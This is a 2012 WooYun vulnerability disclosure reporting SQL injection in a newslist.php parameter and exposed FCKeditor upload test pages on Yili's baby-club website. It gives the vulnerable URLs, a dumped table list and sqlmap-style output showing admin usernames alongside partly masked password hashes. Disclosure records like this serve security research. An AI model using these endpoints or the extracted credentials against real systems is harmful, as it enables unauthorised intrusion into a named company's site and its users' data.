当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2012-014760
漏洞标题:
伊利sql注入和test fckeditor
相关厂商:
伊利
漏洞作者:
luom
提交时间:
2012-11-14 21:03
修复时间:
2012-12-29 21:03
公开时间:
2012-12-29 21:03
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
10
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2012-11-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-12-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

伊利存在sql注射漏洞与fckeditor漏洞,可以成功利用进入后台。

详细说明:

http://yilibabyclub.yili.com/newslist.php?cid=22
newslist.php文件过滤不严 导致注入
http://yilibabyclub.yili.com/fckeditor/editor/filemanager/connectors/uploadtest.html
http://yilibabyclub.yili.com/fckeditor/editor/filemanager/connectors/test.html
注入可得到用户和密码

current database:    'aierclub'
+-----------------------+
| aier_temptab          |
| yili_activity_cat     |
| yili_answers          |
| yili_articletags      |
| yili_attachments      |
| yili_attenction       |
| yili_category         |
| yili_collection_music |
| yili_editortmp        |
| yili_expert_advice    |
| yili_jf_adds          |
| yili_jf_area          |
| yili_jf_cary          |
| yili_jf_city          |
| yili_jf_conts         |
| yili_jf_history       |
| yili_jf_keywords      |
| yili_jf_order         |
| yili_jf_orderdetail   |
| yili_jf_pages         |
| yili_jf_province      |
| yili_logs             |
| yili_manager          |
| yili_music            |
| yili_pages            |
| yili_picture          |
| yili_picture_cat      |
......
......
......


[17:47:23] [INFO] retrieved: 0e27216391e1c9f78b2c8342********
[17:47:24] [INFO] retrieved: admin
[17:47:29] [INFO] retrieved: 0f1fc4043a5886b7be6a3f92********
[17:47:30] [INFO] retrieved: newsmanager    
[17:47:31] [INFO] retrieved: 47f98eb812f4c024f86aada4********
[17:47:32] [INFO] retrieved: aierfaq
[17:47:34] [INFO] retrieved: 70d945641e7ccb833de07054********
[17:47:35] [INFO] retrieved: aiernews
[17:47:36] [INFO] retrieved: add77e3e0a140b05da1f0dcb********
[17:47:36] [INFO] retrieved: loger    
[17:47:37] [INFO] retrieved: b81fd1b160bdebaaf3f1e377********
[17:47:37] [INFO] retrieved: weslywang
[17:47:38] [INFO] retrieved: c81feb1f2a863dc015f313e8********
[17:47:41] [INFO] retrieved: logs2

漏洞证明:

1.jpg


后台

3.jpg

修复方案:

密码强大点,过滤严一点,无用文件删一点,你比我多懂一点。

版权声明:转载请注明来源 luom@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝